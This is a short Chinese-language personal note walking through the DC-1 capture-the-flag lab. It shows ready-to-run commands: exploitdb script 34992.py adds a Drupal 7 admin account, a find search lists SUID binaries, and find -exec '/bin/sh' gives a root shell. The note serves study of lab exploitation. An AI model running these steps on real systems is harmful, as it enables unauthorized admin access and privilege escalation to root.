526互联

DC-1 find提权/sql数据库创建用户(个人笔记)

发布时间 2023-05-07 18:01:45作者: Aidy

进入数据库select * from users\G;  \G为了让界面看着更整洁

 

在exploitdb中有一个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号:

终端/msf输入:searchsploit drupal

python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://url -u admin3 -p admin3    创建成功账号:admin3  密码:admin3

// 使用它一个 Python 脚本的命令行,它将运行名为"34992.py"的 Python 脚本,去创建用户

 

6.flag4

根据提示passwd我们可以想到/etc/passwd    列出用户表

发现flag4的提示,目标发现里面有flag4,给了个路径/home/flag4

首先试试SUID提权

查看默认以root权限执行的程序:find / -perm -u=s -type f 2>/dev/null

find 指令
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
-type 类型
f 文件
2>/dev/nul 过滤错误信息(不显示错误信息)

 

看到find就在其中,那就比较简单了。直接使用find提权

find /var/www -exec "/bin/sh" \;    别忘记添加引号

最终cd 切换到root用户,ls查看到最终的flag,cat打开